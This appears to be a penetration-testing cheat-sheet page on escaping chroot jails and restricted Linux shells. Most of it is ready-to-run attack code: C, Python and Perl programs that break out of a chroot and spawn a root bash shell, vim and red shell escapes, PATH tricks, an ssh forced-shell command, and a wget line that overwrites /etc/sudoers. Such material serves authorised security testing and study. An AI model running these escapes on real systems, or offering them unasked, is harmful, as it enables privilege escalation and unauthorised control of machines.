Search in https://gtfobins.github.io/ if you can execute any binary with “Shell” property
From wikipedia: The chroot mechanism is not intended to defend against intentional tampering by privileged (root) users. On most systems, chroot contexts do not stack properly and chrooted programs with sufficient privileges may perform a second chroot to break out.
Therefore, if you are root inside a chroot you can escape creating another chroot. However, in several cases inside the first chroot you won’t be able to execute the chroot command, therefore you will need to compile a binary like the following one and run it:
{% code title=“break_chroot.c” %}
#include <sys/stat.h>
#include <stdlib.h>
#include <unistd.h>
//gcc break_chroot.c -o break_chroot
int main(void)
{
mkdir("chroot-dir", 0755);
chroot("chroot-dir");
for(int i = 0; i < 1000; i++) {
chdir("..");
}
chroot(".");
system("/bin/bash");
}
{% endcode %}
Using python:
#!/usr/bin/python
import os
os.mkdir("chroot-dir")
os.chroot("chroot-dir")
for i in range(1000):
os.chdir("..")
os.chroot(".")
os.system("/bin/bash")
Using perl:
#!/usr/bin/perl
mkdir "chroot-dir";
chroot "chroot-dir";
foreach my $i (0..1000) {
chdir ".."
}
chroot ".";
system("/bin/bash");
Check if you can modify the PATH env variable
echo $PATH #See the path of the executables that you can use
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin #Try to change the path
echo /home/* #List directory
:set shell=/bin/sh
:shell
Check if you can create an executable file with /bin/bash as content
red /bin/bash
> w wx/path #Write /bin/bash in a writable and executable path
If you are accessing via ssh you can use this trick to execute a bash shell:
ssh -t user@<IP> bash # Get directly an interactive shell
You can overwrite for example sudoers file
wget http://127.0.0.1:8080/sudoers -O /etc/sudoers
https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/
https://pen-testing.sans.org/blog/2012/0b6/06/escaping-restricted-linux-shells
https://gtfobins.github.io
It could also be interesting the page:
{% page-ref page="../useful-linux-commands/bypass-bash-restrictions.md" %}